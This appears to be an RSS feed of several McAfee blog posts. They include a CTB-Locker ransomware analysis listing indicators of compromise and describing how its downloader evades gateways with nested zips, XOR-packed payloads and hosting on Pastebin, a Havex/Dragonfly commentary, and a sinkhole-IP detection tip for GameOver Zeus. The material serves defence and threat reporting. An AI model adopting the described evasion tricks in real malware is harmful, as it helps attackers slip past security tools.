https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacking-human-os-report-social-engineering/feed/ 0
The Rise of Backdoor-FCKQ (CTB-Locker) https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rise-backdoor-fckq-ctb-locker/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rise-backdoor-fckq-ctb-locker/#comments Wed, 21 Jan 2015 18:09:16 +0000 https://blogs.mcafee.com/?p=40787 By Raj Samani (@Raj_Samani) and Christiaan Beek (@ChristiaanBeek) In the McAfee Labs Threats Report published in November 2014, Senior Vice President Vincent Weafer commented that 2014 will be remembered as “the year of shaken trust.” Indeed almost every threat measured saw notable increases in Q3 that pointed to a rather ominous 2015.  There was, however, […]

The post The Rise of Backdoor-FCKQ (CTB-Locker) appeared first on McAfee Blogs.

]]>
By Raj Samani (@Raj_Samani) and Christiaan Beek (@ChristiaanBeek)

In the McAfee Labs Threats Report published in November 2014, Senior Vice President Vincent Weafer commented that 2014 will be remembered as “the year of shaken trust.” Indeed almost every threat measured saw notable increases in Q3 that pointed to a rather ominous 2015.  There was, however, one notable exception: ransomware.

ransomeware

The preceding figure provided a respite against the threat of ransomware, but as foreseen in the McAfee Labs Threats Predictions “Ransomware will evolve its methods of propagation, encryption, and the targets it seeks.”

For many, this prediction appears to be ringing true with the rise in Backdoor-FCKQ (aka known as CTB-Locker) now distributed via multiple channels including IRC, peer-to-peer networks, newsgroup postings, email spam, etc. 

Details

“Backdoor-FCKQ” is a new crypto malware delivered through email that encrypts data files on the target system.

It copies itself to the following folder:

  • %temp%< 7 random characters>.exe
  • %temp%\wkqifwe.exe

It also creates a job task containing seven random characters:

  • %windir%\Tasks\cderkbm.job

The following registry keys are added to the system:

  • %ALLUSERSPROFILE%\Application Data\Microsoft\<7 random characters>

It injects code into svchost.exe, and svchost.exe will launch files from the following:

  • %temp%\<7 random characters>.exe

The code injected into svchost.exe will encrypt files with the following extensions:

  • .pdf
  • .xls
  • .ppt
  • .txt
  • .py
  • .wb2
  • .jpg
  • .odb
  • .dbf
  • .md
  • .js
  • .pl

Once a system is infected, the malware displays the following image:

CTBLocker

The newly created process creates a mutex named:

  • \BaseNamedObjects\lyhrsugiwwnvnn

An interesting angle in this new round of Backdoor-FCKQ malware is the use of the well-known downloader Dalexis. There are several versions of this downloader. A simple query in our internal database resulted in more than 900 hits of this downloader and variants of it. To circumvent antispam tools, the downloader is hidden in a zip file that contains a zip and eventually unpacks to a .scr (screensaver) file.

The function of the downloader is to download additional malware from certain locations, unpack the Xor-coded malware, and execute it. In this case the additional malware, the CTB, was packed in the file pack.tar.gz:

code 1Figure 1: pack.tar.gz.

As we can see from the preceding screenshot, there’s no file header present that represents a known file type. For example, if this were an executable file, the first two characters (aka the magic number) would have been “MZ.” This is one of the ways in which malware authors try to circumvent gateway detection of malware. Some other tricks we have seen frequently recently is to put the payload of the malware on Pastebin or Github.

In this case, pack.tar.gz used different XOR keys to encrypt parts of the file. Once this puzzle was cracked, the unpacked code of Backdoor-FCKQ is revealed:

code 2Figure 2: Unpacked code of Backdoor-FCKQ.

With multiple samples of Backdoor-FCKQ (CTB-Locker) as comparison material, we immediately recognized code parts.

As a quick Yara detection rule, the following can be used:

code 3

Bitcoin trail

While tracing the Bitcoin trail and possible transactions, no value on the account was found and no transactions were made to other accounts.

Removal

All users: Use current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files to hook system start-up will be successfully removed if cleaning with the recommended engine and DAT combination (or later versions).

A special thanks to Sanchit Karve for his assistance in the analysis.

The post The Rise of Backdoor-FCKQ (CTB-Locker) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rise-backdoor-fckq-ctb-locker/feed/ 9
The role of private sector in combatting cybercrime https://securingtomorrow.mcafee.com/business/role-private-sector-combatting-cybercrime/ https://securingtomorrow.mcafee.com/business/role-private-sector-combatting-cybercrime/#respond Fri, 21 Nov 2014 11:48:21 +0000 http://blogs.mcafee.com/?p=39509 This week we announced the signing of a Memorandum of Understanding (MoU) with the European Cybercrime Centre (EC3) that combines our skills in the war against cybercrime. This agreement demonstrates our commitment to addressing the growing menace that each and every one of us faces in the digital world today. As our dependence on the […]

The post The role of private sector in combatting cybercrime appeared first on McAfee Blogs.

]]>
This week we announced the signing of a Memorandum of Understanding (MoU) with the European Cybercrime Centre (EC3) that combines our skills in the war against cybercrime. This agreement demonstrates our commitment to addressing the growing menace that each and every one of us faces in the digital world today.

As our dependence on the internet continues to grow, so too does our vulnerability to the increasingly frequent and sophisticated attacks that cybercriminals wage on businesses and consumers. We must meet these aggressive attacks with not only innovative technology and expertise, but also deeper industry and government collaboration to ensure our defence is strongest.

The harsh reality about the global nature of cybercrime is that no entity can combat it alone, as Troels Oerting the Head of EC3 commented: “This task cannot be done by law enforcement alone, and requires a much broader approach.”

This agreement will see McAfee and EC3 increase the defence against our adversaries through engagement in joint operations to address identified cybercriminal campaigns, the sharing of best practices, and, in a step moving beyond just tactical engagement, the sharing of non-operational technical data as it relates to cybercrime.

At McAfee we strongly believe in the importance of a public-private partnership, and with the McAfee Labs team made up of more than 400 researchers across 30 countries analyzing data from millions of sensors, we work hard to deliver expert insight that enables law enforcement to stop cyber criminals in their tracks.

Our mission at McAfee is to give everyone the confidence to live and work safely and securely in the digital world. I believe this partnership further demonstrates our commitment and, importantly, our ability, to deliver on this mission.

Europol signing2

Troels Oerting and Raj Samani

 

Connect with me on Twitter:  @raj_samani

The post The role of private sector in combatting cybercrime appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/role-private-sector-combatting-cybercrime/feed/ 0
3 key security challenges for the Internet of Things https://securingtomorrow.mcafee.com/business/3-key-security-challenges-internet-things/ https://securingtomorrow.mcafee.com/business/3-key-security-challenges-internet-things/#respond Wed, 29 Oct 2014 20:18:51 +0000 https://blogs.mcafee.com/?p=50316 What challenges pose the biggest threat to the Internet of Things? The Internet of Things (IoT) is already starting to give rise to real-world applications, from connected homes and cars to health monitoring and smart utility meters. Analyst Gartner predicts there will be 26 billion IoT devices – excluding PCs, tablets and smart phones – […]

The post 3 key security challenges for the Internet of Things appeared first on McAfee Blogs.

]]>
What challenges pose the biggest threat to the Internet of Things?

The Internet of Things (IoT) is already starting to give rise to real-world applications, from connected homes and cars to health monitoring and smart utility meters.

Analyst Gartner predicts there will be 26 billion IoT devices – excluding PCs, tablets and smart phones – by 2020. That’s a 30-fold increase from 900 million in 2009.

I was at an event in Munich just last month where a presenter spoke about how it took the decade up to 2005 for the deployment of the first billion internet-connected sensors. The latest billion sensors were implemented during 2013 alone and we are well on our way the first trillion. The pace of this growth is relentless.

But there has been one thing missing from many of the IoT discussions to date – trust. The IoT represents an entirely different level of scale and complexity when it comes to the application of the foundations for this trust, namely security and privacy.

Already we are seeing hacks – proof-of-concept and in the wild – on IoT applications, such as smart TVs and cash machines to malware infected high-risk pregnancy monitors at a Boston hospital in the US. And in its latest internet threat assessment report the European crime agency Europol warns that the IoT creates new types of risks and threats not only in consumer applications but also in critical infrastructure control systems.

It goes on to say: “We can expect to see (more) targeted attacks on existing and emerging infrastructures, including new forms of blackmailing and extortion schemes (e.g. ransomware for smart cars or smart homes), data theft, physical injury and possible death, and new types of botnets.”

Here are three key IoT security challenges I foresee:

1. A trillion points of vulnerability

Every single device and sensor in the IoT represents a potential risk. How confident can an organisation be that each of these devices have the controls in place to preserve the confidentiality of the data collected and the integrity of the data sent.

Researchers at the French technology institute Eurecom downloaded some 32,000 firmware images from potential IoT device manufacturers and discovered 38 vulnerabilities across 123 productsincluding poor encryption and backdoors that could allow unauthorised access. And one weak link could open up access to hundreds of thousands of devices on a network with potentially serious consequences.

2. Trust and data integrity

Corporate systems will be bombarded by data from all manner of connected sensors in the IoT. But how sure can an organisation be that the data has not been compromised or interfered with?

Take the example of utility companies automatically collecting readings from customer smart meters. Researchers have already demonstrated that smart meters widely used in Spain, for example, can be hacked to under-report energy use. They were able to spoof messages being sent from the meter to the utility company and send false data. In recent years we have been able to go to a high street store and buy anti-virus protection on a disc or download it straight to our PC. But in the IoT that security capability doesn’t exist in many of the devices that will suddenly become connected.

Security must be built into the design of these devices and systems to create trust in both the hardware and integrity of the data.

3. Data collection, protection and privacy

The vision for the IoT is to make our everyday lives easier and boost the efficiency and productivity of businesses and employees. The data collected will help us make smarter decisions. But this will also have an impact on privacy expectations. If data collected by connected devices is compromised it will undermine trust in the IoT. We are already seeing consumers place higher expectations on businesses and governments to safeguard their personal information.

And beyond that, what about the security that protects the critical national infrastructure (CNI), such as oil fields and air traffic control? With everything connected, the IoT smashes the separation between the CNI and the consumer world. Everyday household items could potentially be exploited by cybercriminals to gain access to the CNI.

Businesses need start now to identify the risk level for their current exposure to the IoT and where it is going in the future and also think about the privacy and security implications associated with the volume and type of data the IoT will generate.

It truly is a brave new world that promises many exciting opportunities. Trust is the foundation of the IoT and that needs to be underpinned by security and privacy. And it’s a conversation we all need to start having now if we are to reap the benefits of the connected world.

The post 3 key security challenges for the Internet of Things appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/3-key-security-challenges-internet-things/feed/ 0
4 hidden economic costs of cybercrime https://securingtomorrow.mcafee.com/business/4-hidden-economic-costs-cybercrime/ https://securingtomorrow.mcafee.com/business/4-hidden-economic-costs-cybercrime/#respond Wed, 29 Oct 2014 19:59:45 +0000 https://blogs.mcafee.com/?p=50456 There are many obvious and headline-grabbing costs of cybercrime. There are many obvious and headline-grabbing costs of cybercrime. In the past few months alone there have been numerous high-profile data security breaches where hackers have obtained tens of millions of customer details, ranging from credit card numbers to medical records. While the direct cost of […]

The post 4 hidden economic costs of cybercrime appeared first on McAfee Blogs.

]]>
There are many obvious and headline-grabbing costs of cybercrime.

There are many obvious and headline-grabbing costs of cybercrime. In the past few months alone there have been numerous high-profile data security breaches where hackers have obtained tens of millions of customer details, ranging from credit card numbers to medical records.

While the direct cost of insuring against such loss can be made, there are also many hidden – and arguably more serious – costs of cybercrime that hurt individual companies, countries and the global economy as a whole.

McAfee, in conjunction with the Center for Strategic and International Studies (CSIS), compiled a report this summer on the global economic impact and cost of cybercrime. Although the model to estimate cost is constrained by the availability of data regarding losses being reported, it does put a figure on the annual cost to the global economy from cybercrime at somewhere between a conservative lower figure of $375 billion and possibly as much as $575 billion.

The average annual loss due to cybercrime among all countries was 0.5 per cent of GDP, although countries in Europe and North America lost more – with Germany and the Netherlands at 1.6 per cent of GDP. Much of this is as a result of indirect costs that aren’t immediately obvious. Here are four hidden economic costs of cybercrime:

1. Intellectual property (IP) theft and cannibalism

The value of research and development (R&D) is the head start it gives companies in the market and the theft of IP damages innovation. It lessens the returns from R&D for companies and investors, potentially reducing the overall rate of innovation. Calculating the value of IP is, however, the most difficult component of the cost of cybercrime to calculate.

2. Opportunity cost

IP theft can lead to reduced investment in R&D, while cybercrime incidents more generally can lead to risk averse behaviour by businesses and consumers that limits internet use. Take the healthcare sector as an example. The use of IT in healthcare has been slowed by the fear, valid or not, that health information could be stolen, patient data could be manipulated and devices interfered with by hackers. The same may prove true for self-driving cars and other new technologies such as smart meters. In the US privacy and security fears over smart meters even led to one Texas citizen pulling a gun on a public utility contractor sent to install one of the meters. The woman said her concerns were not only about the monitoring and data being collected but the fact that hackers could potentially intercept and access that information.

3. Recovery

This can often be more than the cost of the crime itself. One estimate by the analyst Gartner puts the losses at Target up to $420 million including reimbursement, cost of reissuing cards, legal fees and credit monitoring for millions of customers. The short-term effect on company stock prices can also be significant after a breach, although it usually recovers within a quarter or two. That might change in the future, however, if companies are required to report major hacking incidents and describe what has actually been lost (although its worth noting that many US states already require companies to report breaches).

4. Employment

Cybercrime has serious implications for employment in developed countries. Even small changes in GDP can affect employment and, based on the figures in our report, Europe could lose as many as 150,000 jobs due to the hit on GDP from cybercrime. Of course that’s not necessarily a net job loss figure – many of those would find other work. But the general impact is to shift employment away from high-value jobs to low paying jobs or .

Cybercrime damages trade, competitiveness, innovation and global economic growth. Companies and countries are underestimating their risk and exposure to cybercrime and those that fail to adequately protect their networks will be at an increasing competitive disadvantage.

Make no mistake, cybercrime continues to be a growth industry but the situation is not irreparable. Better technology, stronger defences, best practices for cybersecurity, international agreement on law enforcement and companies doing a better job of assessing risk can all help tackle cybercrime.

The post 4 hidden economic costs of cybercrime appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/4-hidden-economic-costs-cybercrime/feed/ 0
Operation Dragonfly Imperils Industrial Protocol https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-imperils-industrial-protocol/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-imperils-industrial-protocol/#respond Wed, 02 Jul 2014 19:52:54 +0000 http://blogs.mcafee.com/?p=36338 Recent headlines (here and here) may have struck fear into those living near major energy installations due to references about the Stuxnet malware. In 2009, this particular strain of malware caused significant damage to the Nantanz nuclear facility, reportedly destroying a fifth of Iran’s nuclear centrifuges. Recent reports about Operation Dragonfly, however, appear to be […]

The post Operation Dragonfly Imperils Industrial Protocol appeared first on McAfee Blogs.

]]>
Recent headlines (here and here) may have struck fear into those living near major energy installations due to references about the Stuxnet malware. In 2009, this particular strain of malware caused significant damage to the Nantanz nuclear facility, reportedly destroying a fifth of Iran’s nuclear centrifuges. Recent reports about Operation Dragonfly, however, appear to be focused on espionage (at least for now), and the scope of the attack appears to be considerably broader than that of Stuxnet.

The various elements associated with Operation Dragonfly draw comparison with Operation Shady RAT; in which at least the first phase targeted specific individuals via email. Beyond the specifics of the operation, however, Operation Dragonfly raises very significant concerns regarding the safety of systems that comprise our critical infrastructure, and in particular regarding the ever-growing supply chain.

This threat was covered in detail in the recently published book “Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure,” coauthored by Raj Samani and Eric Knapp, and edited by Joel Langill. The espionage from Dragonfly could lead to another attack. In the book the authors write: “the SCADA and automation systems within the grid also provide a blueprint to the inner workings of the grid operations. This is valuable intellectual property that could be used for malicious purposes ranging from the influence of energy trading to the development of a targeted, weaponized attack against the grid infrastructure or against the grid operator.”

One of the primary tools leveraged in Operation Dragonfly is Havex. The Havex remote access tool (RAT) can be traced back to (at least) mid-2012 and is not necessarily exclusive to this attack or campaign or actor. Havex is closely related to the SYSMain RAT, and may even be a derivative. We have also observed them used in conjunction. The Trojan is distributed via spear phishing, watering-hole attacks, and by inclusion in exploit kits (such as LightsOut). This family takes advantage of OLE for Process Control (OPC) servers.

The method by which the Havex RAT targeted industrial control systems owners was clever. In addition to spear phishing, the control system vendors’ websites were used as watering holes, ensuring that the delivery of the RAT was highly focused. The next stage, the enumeration of OPC servers, is also clever and very concerning. The malware focuses enumeration on OPC Classic, which lacks the security features of newer OPC variants, and indicates that the attacker is knowledgeable about industrial security—a niche that, to some, benefited from “security through obscurity.” The biggest concern, therefore, is that once again we’re seeing malware targeting an industrial protocol.

In “Applied Cyber Security” the authors wrote, “Industrial protocols in and of themselves represent a challenge to cyber security. … Because most of these protocols provide command and control functionality to the system, an interruption could result in the failure of [a variety of critical systems].

“Industrial protocols in and of themselves represent a challenge to cyber security. … Because most of these protocols provide command and control functionality to the system, an interruption could result in the failure of substation automation, dynamic load management, fault isolation, and even protection systems.”

By specifically targeting OPC Classic, the attacker is likely to discover more vulnerable legacy systems. OPC is extremely common, and can interface with a variety of key systems within almost every industrial environment, from almost every sector. From a network design perspective, OPC uses a wide range of ports; unless OPC is tunneled, firewalls allowing OPC are as open as Swiss cheese. Although there’s still a lot to learn about Havex, this event should inspire asset owners to harden OPC servers, and to assess their networks with this type of attack in mind. Inspection and enforcement of OPC using application-layer firewalls is a good start. Without an industry-wide effort to stem the inherent vulnerabilities in OPC, Havex could prove itself to be another devastating “industrial” RAT—alongside DisktTrack (a.k.a. Shamoon), Duqu, Stuxnet, and Gauss—capable of remote command of control systems. That is something that no one wants to see happen.

For more information, please refer to “Applied Cyber Security and the Smart Grid.”

The post Operation Dragonfly Imperils Industrial Protocol appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-imperils-industrial-protocol/feed/ 0
GameOver Zeus/Cryptolocker: Am I Still Infected? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gameover-zeuscryptolocker-still-infected/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gameover-zeuscryptolocker-still-infected/#respond Fri, 27 Jun 2014 23:32:02 +0000 http://blogs.mcafee.com/?p=36182 It has been two weeks since the announcement by multiple global law enforcement agencies regarding the takedown of the communications infrastructure for the Trojans GameOver Zeus and Cryptolocker. Judging by the number of downloads for the McAfee Stinger utility, thousands of systems worldwide no longer provide money to Evgeniy Mikhailovich Bogachev and his associates. However, […]

The post GameOver Zeus/Cryptolocker: Am I Still Infected? appeared first on McAfee Blogs.

]]>
It has been two weeks since the announcement by multiple global law enforcement agencies regarding the takedown of the communications infrastructure for the Trojans GameOver Zeus and Cryptolocker. Judging by the number of downloads for the McAfee Stinger utility, thousands of systems worldwide no longer provide money to Evgeniy Mikhailovich Bogachev and his associates.

However, managing the cleanup across multiple systems can be an onerous task. For those responsible for managing many systems, running the McAfee Stinger in a systematic fashion across all devices is simply not an option. Infected systems that connect to one of the sinkholes will also make a connection to the following IP address: 72.52.116.52:4643.

McAfee recommends that system managers not block or filter this address because it acts as a useful indicator for infected devices, and connecting to this address does not introduce any risk.

With this information, it is possible to configure your security products to alert you should any of your systems attempt to connect to this IP address and port number. McAfee Enterprise Security Manager (see Figure 1) provides real-time visibility into all activity across systems, networks, databases, and applications. McAfee Enterprise Security Manager provides real-time situational awareness, and this rule allows organizations to respond intelligently and efficiently in mitigating GameOver Zeus and Cryptolocker infections.

ESM GOZ 1 Figure 1: McAfee Enterprise Security Manager.

In order to detect whether any systems are attempting to connect to this lighthouse IP address, an alert can be created that will generate an alarm when the rule is activated (see Figure 2):

ESM GOZ 2Figure 2: A McAfee Enterprise Security Manager alarm.

When activated, the alarm will inform the system administrator which system is likely infected. This provides an opportunity to focus your removal efforts using an efficient means to address GameOver Zeus and Cryptolocker infections.

Thanks to Martin DeJongh, Enterprise Technology Architect, for his assistance with this post and guidance.

The post GameOver Zeus/Cryptolocker: Am I Still Infected? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gameover-zeuscryptolocker-still-infected/feed/ 0
Cloud Computing for Critical Infrastructure https://securingtomorrow.mcafee.com/business/cloud-computing-for-critical-infrastructure-2/ https://securingtomorrow.mcafee.com/business/cloud-computing-for-critical-infrastructure-2/#respond Mon, 04 Feb 2013 17:20:03 +0000 http://blogs.mcafee.com/?p=21770 Cloud computing continues to be a hot topic. But so what if people are talking about it, who is actually adopting it? One of the questions I have been asking myself is, ‘Will cloud be adopted for critical infrastructure? And what is the security perspective on this? Naturally a blog to answer that question will […]

The post Cloud Computing for Critical Infrastructure appeared first on McAfee Blogs.

]]>
Cloud computing continues to be a hot topic. But so what if people are talking about it, who is actually adopting it? One of the questions I have been asking myself is, ‘Will cloud be adopted for critical infrastructure? And what is the security perspective on this?

Naturally a blog to answer that question will never really do the topic any justice. But it is a crucial issue. I wrote about critical cloud computing already a year ago on my blog, and over the past years I have worked on these issues, for example with the European Network and Information Security Agency (ENISA), who have published the white paper; Critical Cloud Computing: A CIIP Perspective on cloud computing services.

The ENISA paper focusses on large cyber disruptions and large cyber attacks, as in the EU’s Critical Information Infrastrcuture Protection (CIIP) plan, e.g.) and looks at the relevant underlying threats like natural disaster, power network outages, software bugs, exhaustions due to overload, cyber attacks, etc. It underlines the strengths of cloud computing, when it comes to dealing with natural disasters, regional powercuts and DDoS attacks. At the same time it highlights that the impact of cyber attacks could be very large, because of the concentration of resources. Everyday people discover software exploits, in widely used software (this week UPnP, last month Ruby on Rails, and so on). What would be the impact if there was a software exploit for a cloud platform used widely across the globe?

As an expert on the ENISA Cloud Security and Resilience Working Group, I see this white paper as the starting point for discussions about what are the big cloud computing risks from a CIIP perspective. Revisiting the risk assessments we worked on in the past is important, mainly because the use of cloud computing is now so different, and because cloud computing is being adopted in critical sectors like finance, energy, transport and even governmental services.

A discussion about the CIIP perspective on cloud computing becomes all the more relevant in the light of the EU’s Cyber Security strategy, which will focus on critical sectors and preventing large-scale cyber attacks and disruptions. The strategy will be revealed by the European Commission in February and it will be interesting to see what role cloud computing will play in the strategy.

The report is available on the ENISA website at; https://resilience.enisa.europa.eu/cloud-security-and-resilience/cloud-computing-benefits-risks-and-recommendations-for-information-security/view

There is no doubt that internet connections and cloud computing are becoming the backbone of our society. The adoption within critical infrastructure sectors means that resilience and security becomes even more imperative for all of us.

[Note: This article was also published on the Cloud Security Alliance website]

 

The post Cloud Computing for Critical Infrastructure appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-computing-for-critical-infrastructure-2/feed/ 0
Books Fight Back https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/books-fight-back/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/books-fight-back/#respond Mon, 07 Feb 2011 16:35:07 +0000 http://blogs.mcafee.com/?p=7522 You know I always thought that at some point, printed books would go the same way as vinyl.  Despite sporadic revivals by the music industry and its use by particular groups such as the electronic and “mixmasters,” the majority of households have already replaced turntables for the latest technologies.  Equally the latest published shopping trends […]

The post Books Fight Back appeared first on McAfee Blogs.

]]>
You know I always thought that at some point, printed books would go the same way as vinyl.  Despite sporadic revivals by the music industry and its use by particular groups such as the electronic and “mixmasters,” the majority of households have already replaced turntables for the latest technologies. 

Equally the latest published shopping trends suggest a transition from printed to electronic books; so I wasn’t surprised to learn that Amazon has just announced that Kindle book sales outstrip paperbacks by 15% and hardbacks, by 45%. (http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=)

The gradual shift, and more importantly reliance on technology means that failure to observe one of the three key tenants of Information security, Availability, is having a dramatic impact on people’s lives.  Take for example the recent virus outbreak at Portsmouth libraries.  It was reported that the impact of this outbreak resulted in public internet access being suspended for two weeks.  (http://www.bbc.co.uk/news/uk-england-hampshire-12199223)

Although this is unlikely to be a problem for technology professionals like yourself, for many people this is the only lifeline they have to the online world.  A member of the Portsmouth Pensioners Association said that “A lot of our members do go to use the computers, because maybe they can’t afford to buy one or run one from home.  It’s a shame for them because it’s a good way to stay in contact with people.” 

Ensuring that systems are protected from unauthorized malware is a critical function for every organization, but when those systems provide a civic function to some of the most vulnerable groups in society, then it should be mandatory.  Access to the online world is now absolutely necessary in order to compensate for the closure of a number of post offices throughout the UK, and so the role of the local libraries is becoming more important than ever before.

Unless we want to keep the internet to only those lucky enough to own a computer, and only allow them access to the array of services both public and private sector has to offer, more must be done to ensure that outages are prevented.  After all, there are solutions available to protect systems from such outages.

The post Books Fight Back appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/books-fight-back/feed/ 0